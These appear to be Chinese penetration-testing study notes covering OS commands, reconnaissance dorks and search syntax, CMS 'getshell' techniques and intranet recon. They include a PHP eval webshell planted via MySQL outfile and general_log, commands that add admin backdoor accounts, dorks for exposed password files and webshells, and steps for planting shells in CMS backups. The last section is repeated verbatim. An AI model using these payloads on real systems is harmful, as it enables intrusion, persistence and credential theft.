渗透安全学习记录笔记

admin管理员组

文章数量:1595564

渗透安全笔记

1.企业常用的cms：

ddecms 织梦 ， 米拓，xdcms，南方，aspcms，动易，帝国cms

1.windows基础

1.计算机端口

范围是从1-65535

http协议常用端口：80、8080、3128、8081、9080
ftp协议（文件传输）：21
telnet（远程连接）：23
tftp（udp）：69
ssh（安全登录、scp文件传输、端口重定向）：22
TOMCAT，默认的端口号为8080；
WIN2003远程登陆，默认的端口号为3389；
Oracle 数据库，默认的端口号为1521；
MS SQL*SERVER数据库server，默认的端口号为1433/tcp 1433/udp；
QQ，默认的端口号为1080/udp
Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口）；
POP3 Post Office Protocol (E-mail) ，默认的端口号为110/tcp；

	nmap识别端口指纹看服务开启

2.注册表结构

1.HKEY_CLASSES_ROOT
 　　管理文件系统。根据在Windows 中安装的应用程序的扩展名,该根键指明其文件类型的名称，相应打开该文件所要调用的程序等等信息。
2.HKEY_CURRENT_USER
               管理系统当前的用户信息。在这个根键中保存了本地计算机中存放的当前登录的用户信息,包括用户登录用户名和暂存的密码。在用     户登录Windows 98时，其信息从HKEY_USERS中相应的项拷贝到HKEY_CURRENT_USER中。
 3.HKEY_LOCAL_MACHINE
      管理当前系统硬件配置。在根键这个中保存了本地计算机硬件配置数据,此根键下的子关键字包括在SYSTEM.DAT中,用来提供HKEY_LOCAL_MACHINE所需的信息,或者在远程计算机中可访问的一组键中。
这个根键里面的许多子键与System.ini文件中设置项类似。
4.HKEY_USERS
      管理系统的用户信息。在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表。同时每个用户的预配置信息都存储在HKEY_USERS根键中。HKEY_USERS是远程计算机中访问的根键之一。
5.HKEY_CURRENT_CONFIG
      管理当前用户的系统配置。在这个根键中保存着定义当前用户桌面配置(如显示器等等)的数据,该用户使用过的文档列表（MRU），应用程序配置和其他有关当前用户的Windows 98中文版的安装的信息。

通过注册表进行管理员克隆

根据administrator对应的十六进制，f值是账号权限信息

dll劫持，进程注入

3.dos命令

ping -t -l
ipconfig /release  释放ip
ipconfig /renew  重新获得ip
	arp -a
	net view 查看局域网内其他计算机名称
shutdown -s -t 180 -c "你被黑了，系统马上关机"

	netstat -n 
tracert    追踪路由

telnet
net use k: \\192.168.1.1\c$
net use k: \\192.168.1.1\c$ /del
net start 查看开启了哪些服务 
net start 服务名　 开启服务；(如:net start telnet， net start schedule) 
net stop 服务名 停止某服务
net user 用户名　密码　/add 建立用户 
net user guest /active:yes 激活guest用户 
net user 查看有哪些用户 
net user 帐户名 查看帐户的属性 
net locaLGroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 
net user guest 12345 用guest用户登陆后用将密码改为12345 
net password 密码 更改系统登陆密码 
net share 查看本地开启的共享 
net share ipc$ 开启ipc$共享 
net share ipc$ /del 删除ipc$共享 
net share c$ /del 删除C：共享 

Tasklist -v 查看进程
Tsklkill /im qq.exe /f   结束进程

Echo  “”命令行写入文件
Query user  查看登录用户  或者quser
Msg user “hello” 与其他系统账号聊天

hostname  计算机名称  
wmic product get name,version    查看当前安装程序
net config workstation   查看当前登录域
cmdkey /l   查看远程连接历史记录
net user /domain  查看域内用户信息
net user xx /domain  查看xx域用户详细信息
net user /domain xx 123123  修改域用户密码

net group "domain admins" /domain       获取域管理列表
net group "domain controllers"  /domain 获取域控
net localgroup administrators cracer\cc /add    将域用户cc添加到本地管理员组

net view /domain  查看内网多少个域
net view /domain:cracer   查看cracer域中的机器列表

4.批处理 （后缀名. bat）

copy con 123.bat
net user cracer 123123 /add
net localgroup administrator cracer /add
Ctrl+z 

5.powershell

Get-command  获取命令
Get-help  get-service  获取命令使用说明
获取PowerShell版本信息
Get-Host或$PSVersionTable
获取当前PowerShell环境包含的Module
Get-Module
Get-server   获取计算机服务
Get-ExecutionPolicy 查看执行策略 Set-ExecutionPolicy 设置
	-exec bypass + 执行运行的脚本 可以直接执行

2.Linuxs基础

常用命令

uname       查看系统内核信息 -r查看内核版本号 -a  显示详细信息
hostname    查看或临时修改主机名称
cat /proc/cpuinfo    查看系统cpu信息
cat /proc/meminfo    查看系统内存信息
halt        关机
reboot      重启
pwd	    查看工作目录
du	    统计目录及文件空间占用情况 -sh统计目录大小

权限设置命令： Chmod 
   U 是所有者用户  g 是组 o其他人 a所有人
   R读  w写 x可执行
   用法
   Chmod u+w  给所有者用户添加写入权限
   Chmod g-r     给所在分组去掉读取权限
   权限用数字代替
   R=4    w=2  x=1     权限值等于每个权限数字相加
   Chmod 777     给所有权限设置为可读可写可执行
   Chown  设置所有者和所在分组用户
   Chown  Apache:Apache    test   登录吧test目录所有者和所组设置为Apache用户

touch 创建文件或跟新文件时间标记
mkdir 创建目录命令   -p递归创建目录
cp	复制文件或目录  -r递归复制  -f强制覆盖 -p保持源文件属性不变
-i 覆盖文件目录提醒
rm 	删除文件或目录  -r递归删除  -f 强制删除不提醒  -i 删除时用户提醒
mv  移动文件或目录
wc	统计文件中出现的单词数量字节数量和行数
Cat 查看文件内容命令

find命令
   用途：用于查找文件或目录
   格式：find  [查找范围]  [查找条件]
   常用查找条件
   -name：按文件名称查找 
   -size：按文件大小查找
   -user：按文件属主查找
   -type：按文件类型查找
   root@localhost ~]# find /etc -name "resol*.conf"
   /etc/resolv.conf
   /etc/sysconfig/networking/profiles/default/resolv.conf

gzip  文件名  压缩文件    格式为后缀有.gz
tar  归档命令  释放归档文件  没有压缩功能
   格式 
   tar  选项  归档文件名   源文件或目录  
   -c  创建归档文件           扩展名为.tar
   -v 输出详细信息       -f   表示使用归档文件   如 -cvf  创建归档文件
   tar  -cvf  4.tar 1 2 3   将文件1 2 3 打包归档为4.tar
   tar  -xvf  4.tar         解包归档文件4.tar            -xvf  解包归档文件
   -x  解开归档文件    -t  列表查看包内的文件（不释放解包）

useradd命令
   格式：useradd  [选项]...  用户名
   常用命令选项
   -u：指定 UID 标记号
   -d：指定宿主目录，缺省为 /home/用户名
   -e：指定帐号失效时间
   -g：指定用户的基本组名（或UID号）
   -G：指定用户的附加组名（或GID号）
   -M：不为用户建立并初始化宿主目录
   -s：指定用户的登录Shell
   [root@localhost ~]# useradd -d /ftphome/mike -g mike -G ftpuser -s /sbin/nologin mike 

Ps  -aux  查看系统进程
Top          动态查看系统进程
Kill   1234   杀死进程1234

Ifconfig  eth0  192.168.1.20/24   临时修改eth0 网卡ip
Route –n  查看系统路由信息

netstat命令
   查看系统的网络连接状态、路由表、接口统计等信息
   格式：netstat [选项]
   常用选项：
   -a：显示所有活动连接
   -n：以数字形式显示
   -p：显示进程信息
   -t：查看TCP协议相关信息
   -u：查看UDP协议相关信息
   -r：显示路由表信息

重启网络服务：Service  network restart
域名解析配置：/etc/resolv.conf 文件 用途：保存本机需要使用的DNS服务器的IP地址

3.信息收集

1.web owasp top10

2. 其他服务：

   漏洞利用

   爆破片口令

   欺骗 arp

   钓鱼

3. 服务

   nmap扫描端口

web信息收集

1.域名信息

1.对应ip收集
	相关域名对应ip，相关工具：nslookup、一些工具网站
2.子域名收集: 
	大学、机构、大型政府、机构，企业，团体机构的站点
		工具：layer、subDomainsBrute
subDomainsBrute python2运行

3.whois（注册人）信息查询
    根据已知域名反查，分析出此域名的注册人、邮箱、电话等
    工具：爱站网、站长工具、微步在线（https://x.threatbook）
    site.ip138、searchdnscraft

2.敏感目录

收集方向
	robots.txt、后台目录、安装包、上传目录、mysql管理接口、安装页面、phpinfo、编辑器、iis短文件,分析网站cms

常用工具
    字典爆破 >> 御剑、dirbuster、wwwscan、IIS_shortname_Scanner等
    蜘蛛爬行 >> 爬行菜刀、webrobot，burp等

3.旁站C段

旁站：同服务器其他站点   爱站查询
	ip,域名，端口，目录
C段：同一网段其他服务器
收集方向：域名、端口、目录
    常用工具：
    web >>  http://www.5kik/c/、目录扫描工具
    端口 >>  portscan

4.整站分析

服务器类型
	服务器平台、版本等
网站容器
	搭建网站的服务组件，例如：iis、Apache、nginx、tomcat等
脚本类型	ASP、PHP、JSP、aspx等
数据库类型
	access、sqlserver、mysql、oracle、postgresql等
CMS类型
WAF

5.谷歌hacker

Intext:  查找网页中含有xx关键字的网站  例：Intext：管理员登录
Intitle：  查找某个标题  例：intitle：后台登录
Filetype： 查找某个文件类型的文件     例：数据挖掘 filetype：doc
Inurl:  查找url中带有某字段的网站   例：inurl：php?id= 
Site：  在某域名中查找信息 

查看网站支持的脚本
    filetype:asp
    filetype:jsp 
    filetyp:php 
    filetype:ASPX
    .查找管理后台：
    intext:管理 或 intext:后台 或 intext:登陆  
    filety的使用（和site联用）
    login|logon  //搜索后台登录
    error|warning  //错误信息
    username|userid|ID  //后台登录
    password|passcode  //后台登录
    admin|administrator  //后台登录

搜索信息泄露
    intitle:"index of" etc
    intitle:"Index of" .sh_history
    intitle:"Index of" .bash_history
    intitle:"index of" passwd
    intitle:"index of" people.lst
    intitle:"index of" pwd.db
    intitle:"index of" etc/shadow
    intitle:"index of" spwd
    intitle:"index of" master.passwd
    intitle:"index of" htpasswd
    intitle:"index of" admin
    inurl:service.pwd
    intitle:phpmyadmin intext:Create new database  //搜索phpmyadmin直接进入后台
    intitle:"php shell*" "Enable stderr" filetype:php//批量搜索webshell
    intitle:"index of" data   //列出data目录
    intilte:"error occurred" ODBC request where (select|insert)  //搜索sql注入出错页面
    intitle:index.of filetype:log   //搜索日志文件

6.url采集

采集相关url的同类网站
    例如：
    php?id=
    漏洞网站
    相同某种指纹网站
常用工具
    谷歌hacker
    url采集器

7.网络设备

shodan和钟馗之眼

网络搜索引擎偏向网络设备以及服务器的搜索，具体内容可上网查阅，这里给出它的高级搜索语法。
地址：https://www.shodan.io/
搜索语法
hostname：　　搜索指定的主机或域名，例如 hostname:”google”
port：　　搜索指定的端口或服务，例如 port:”21”
country：　　搜索指定的国家，例如 country:”CN”
city：　　搜索指定的城市，例如 city:”Hefei”
org：　　搜索指定的组织或公司，例如 org:”google”
isp：　　搜索指定的ISP供应商，例如 isp:”China Telecom”
product：　　搜索指定的操作系统/软件/平台，例如 product:”Apache httpd”
version：　　搜索指定的软件版本，例如 version:”1.6.2”
geo：　　搜索指定的地理位置，例如 geo:”31.8639, 117.2808”
before/after：　　搜索指定收录时间前后的数据，格式为dd-mm-yy，例如 before:”11-11-15”
net：　　搜索指定的IP地址或子网，例如 net:”210.45.240.0/24”

censys搜索引擎

censys搜索引擎功能与shodan类似，以下几个文档信息。
地址：https://www.censys.io/
搜索语法
默认情况下censys支持全文检索。

    23.0.0.0/8 or 8.8.8.0/24　　可以使用and or not
    80.http.get.status_code: 200　　指定状态
    80.http.get.status_code:[200 TO 300]　　200-300之间的状态码
    location.country_code: DE　　国家
    protocols: (“23/telnet” or “21/ftp”)　　协议
    tags: scada　　标签
    80.http.get.headers.server：nginx　　服务器类型版本
    autonomous_system.description: University　　系统描述
    正则

fofa搜索引擎

FoFa搜索引擎偏向资产搜索。
地址：https://fofa.so
搜索语法
    title=”abc” 从标题中搜索abc。例：标题中有北京的网站。
    header=”abc” 从http头中搜索abc。例：jboss服务器。
    body=”abc” 从html正文中搜索abc。例：正文包含Hacked by。
    domain=”qq” 搜索根域名带有qq的网站。例： 根域名是qq的网站。
    host=”.gov” 从url中搜索.gov,注意搜索要用host作为名称。
    port=”443” 查找对应443端口的资产。例： 查找对应443端口的资产。
    ip=”1.1.1.1” 从ip中搜索包含1.1.1.1的网站,注意搜索要用ip作为名称。
    protocol=”https” 搜索制定协议类型(在开启端口扫描的情况下有效)。例： 查询https协议资产。
    city=”Beijing” 搜索指定城市的资产。例： 搜索指定城市的资产。
    region=”Zhejiang” 搜索指定行政区的资产。例： 搜索指定行政区的资产。
    country=”CN” 搜索指定国家(编码)的资产。例： 搜索指定国家(编码)的资产。
    cert=”google” 搜索证书(https或者imaps等)中带有google的资产。
    高级搜索：
    title=”powered by” && title!=discuz
    title!=”powered by” && body=discuz
    ( body=”content=\”WordPress” || (header=”X-Pingback” && header=”/xmlrpc.php” && body=”/wp-includes/“) ) && host=”gov”

8.kali

1.dns信息收集

1.fierce 
工具主要是对子域名进行扫描和收集信息的。使用fierce工具获取一个目标主机上所有ip地址和主机信息。还可以测试区域传送漏洞。
fierce -dns baidu 获取其他域名
--wordlist 指定字典
fierce -dns ns9.baidu  --wordlist host.txt /tmp/12.txt

2.dig工具也是一款比较流行的dns侦查工具
dig www.cracer  查询dns
dig -t ns cracer  找解析域名的授权dns
dig axfr @ns1.dns cracer 

2.目录爆破

dirb 工具是一款非常好用的目录暴力猜解工具，自带强大字典
dirb http://www.cracer
dirb https://www.cracer
dirb http://www.cracer /usr/wordlist.txt

3.整站识别

whatweb
用来识别网站cms 及大家平台环境的工具
whatweb -v http://www.cracer

4.waf识别

wafw00f 
用来识别网站waf的一款工具
wafw00f 
http://www.cracer

DMitry（Deepmagic Information Gathering Tool）是一个一体化的信息收集工具。它可以用来收集以下信息：
1. 端口扫描
2. whois主机IP和域名信息
3. 从Netcraft获取主机信息
4. 子域名
5. 域名中包含的邮件地址
尽管这些信息可以在Kali中通过多种工具获取，但是使用DMitry可以将收集的信息保存在一个文件中，方便查看。
dmitry  -wnpb cracer
dmitry -winse  cracer   扫描网站注册信息
dmitry  -p cracer  -f -b 查看主机开放端口

4.getshell

4.1前台getshell

借助高权限完成拿shell
sql注入
上传漏洞
编辑器getshell
st2漏洞
反序列漏洞
中间件漏洞
iisput上传getshell
解析漏洞拿shell
代码执行
文件包含
命令执行getshell
echo "<?php phpinfo();?>" > /var/www/html/a.php

4.2后台getshell

1.进入直接上传getshell
2.通过修改上传类型，getshell
3.数据库备份getshell
4.配置插马（asp、php都可以）
5.上传插件（wordpress博客类cms、dz、米拓cms）
6.模板编辑插马（ecshop、织梦dedecms）
7.根据cms漏洞-getshell的漏洞直接getshell
8.通过数据库导shell-getshell（看后台的操作权限）
9.突破上传
10.编辑器getshell
11.借助文件的包含躲避 waf拦截（上传大马）

织梦

1.查看版本信息/data/admin/ver.txt
2.借助谷歌语法搜索后台的信息
3.文件式管理器，脚本上传，插码 ，对网站源码操作
4.阉割版---进行media_main.php?dpost=filemanager替换
5.上传权限位置------通过改名../1.php跨越目录
6.系统，数据库执行

数据库备份拿shell

动易 南方 良精   
数据库备份页面：manage_backup.asp
数据库备份等于重命名
	上传图片马，备份改名，然后查看图片马 
	若备份的任然是数据库（jet，database，db），可以在文本类，文章，用户插入一句话，备份数据库，改名
	不能修改内容的审查元素，抓包进行修改
	管理员添加一句话，审查其元素修改长度大小

突破上传getshell

找源码自带的上传接口（尽量不要突破编辑器的上传，除非有编辑器漏洞）
用ie6访问查看编辑器（版本问题）

修改配置插码：

注意必须清楚是哪个文件，而不是数据库
htm闭合不能闭合脚本代码
马一定要插入到脚本页面当中才可以getshell

注意：
1.知道插入的脚本位置
2.注意闭合
3.注意长度问题
4.尽量规避特殊符号（代码本身自带的转移函数） aspcms配置插码

iis 允许asp、aspx、php执行
解析漏洞需要配合编辑器漏洞
	看容器apache-------x.php.zzz
		 nginx-------x.jpg/.php

phpmyadmin

利用phpmyadmin漏洞利用攻击
尝试万能密钥
使用msf漏洞利用
文件包含getshell

###phpmyadmin getshell:
	select "<?php @eval($_POST[a]);?>" into outfile 'xxxx（网站根目录）'
1.找到网站根目录  select @@basedir；
2.根据mysql安装路径推出apache配置文件位置（一般在网站的根目录）
XXX/apache/conf/httpd.conf
3.使用某个数据库，创建一个表，用来记录读取的apache的配置文件
use mysql
create table xx(xx.txt);
load data infile "xxxx(apache配置路径)" into table xx;
查看表的内容，获取网站根目录
select xx

ctrl + f 搜索 documentroot
导出函数select "<?php @eval($_POST[a]);?>" into outfile 'xxxx（网站根目录）'

##waf拦截导入shell：
    首先找免杀马
    开启外联
    Grant all privileges on *.* to 'root'@'%' identified by 'cc4789' with grant option;
    通过远程地址连接mysql服务器，导入一句话getshell
  
##导出函数被禁用：
1.找phpmyadmin漏洞利用
2.使用生成日志来getshell
mysql>set global general_log=on;  
mysql>set global general_log=off; 
mysql>set global general_log_file='E:\\phpStudy\\MySQL\\storm.log'; 

未知cms拿shell

1、前台检测
检测前台有没有注入、编辑器、上传、接口。
检测中间件有无漏洞来拿shell
2、后台检测
检测后台所有功能、包括上传接口，和已知编辑器。
检测数据库备份，标题配置等位置。
检测容器版本，看是否能利用
百度cms类型拿shell

#动易南方 良精拿shell的方法：
    1.双文件上传
    2.数据库备份（备份图片马，备份原有的数据库）
    3.配置插码
    4.修改editor/admin_style.asp
    5.通过修改上传类型上传添加getshell（asa/cer/php）
    
#科讯（kesioncms）用ie浏览器

提权

获取webshell权限，对网站进行任意修改
获取服务器的管理员权限（系统权限）

1.网站服务用户权限
2.webshell
3.系统权限（system root）

asp、php 匿名权限 网络服务用户
aspx 普通用户权限 cmd调用
jsp 管理员权限
	脚本所处的权限取决容器的用户身份
	
ipconfig /all
systeminfo 补丁
防火墙

端口情况
	软件 tasklist 看进程，默认安装目录
	netstat -an 连接
支持的脚本情况
	asp站点 
	cmd 上传cmd无法执行
	aspx 系统cmd
	php 条用cmd
对比管理员组中的管理员与系统的创建日期
net localgroup administrators

系统信息收集脚本

@echo off  
echo #########system info collection  
systeminfo 
ver 
hostname 
net user 
net localgroup 
net localgroup administrators 
net user guest 
net user administrator 
echo #######at- with   atq##### 
echo schtask /query 


@echo off  
echo 
echo ####task-list############# 
tasklist /svc 
echo 
echo ####net-work infomation 
ipconfig/all 
route print 
arp -a 
netstat -anipconfig /displaydns 
echo 
echo #######service############ 
sc query type= service state= all 
echo #######file-############## 
cd \ 
tree -F

漏洞补丁对比

C:\Windows\Temp\temp.txt&(for %i in (KB977165 KB970483 KB3057191 KB3079904 KB3077657 KB3045171 KB2840221 KB3000061 KB2850851 KB2707511 KB2711167 KB2124261 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440 KB3124280 KB3143141 KB3134228) do @type C:\Windows\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\temp.txt

内网搭建

1.ncpa.cpl 固定ip，dns，
2.dcpromo配置dns
3.gpupdate /force 刷新组织策略
4.\\与服务器地址 policies为下发策略
5.可以脚本破解下发的密码  powershell -exec bypass .\aa.ps1


防火墙
1.第一个网卡vnet1为内网，网卡2 桥接模拟公网
2.配置防火墙
		1. 7安装
		2.绑定接口（默认绑定）
		3.设置内网ip：192.168.10.10 24子网掩码  admin mono
			wan 设置绑定
			
3.路由配置
	

内网信息收集

#拿到跳板机权限之后
1.提权（尽可能最高）
2.本地信息收集（是否有域网络环境）
3.网络信息收集（发现目标主机，探测网络环境拓扑）
	
	
	
#如何查找内网的网段：
1.用工具扫网段 nmap,s.exe
2.文件共享链接记录（ftp，网页浏览记录，mstc3389）
3.抓包分析网络流量(分析流量看网段)
	meterperter抓取目标机的所在网络流量

看进程
tasklist
netstat -ano
systeminfo
net share

route print

内网搭建

1.ncpa.cpl 固定ip，dns，
2.dcpromo配置dns
3.gpupdate /force 刷新组织策略
4.\\与服务器地址 policies为下发策略
5.可以脚本破解下发的密码  powershell -exec bypass .\aa.ps1


防火墙
1.第一个网卡vnet1为内网，网卡2 桥接模拟公网
2.配置防火墙
		1. 7安装
		2.绑定接口（默认绑定）
		3.设置内网ip：192.168.10.10 24子网掩码  admin mono
			wan 设置绑定
			
3.路由配置
	

内网信息收集

#拿到跳板机权限之后
1.提权（尽可能最高）
2.本地信息收集（是否有域网络环境）
3.网络信息收集（发现目标主机，探测网络环境拓扑）
	
	
	
#如何查找内网的网段：
1.用工具扫网段 nmap,s.exe
2.文件共享链接记录（ftp，网页浏览记录，mstc3389）
3.抓包分析网络流量(分析流量看网段)
	meterperter抓取目标机的所在网络流量

看进程
tasklist
netstat -ano
systeminfo
net share

route print

本文标签： 笔记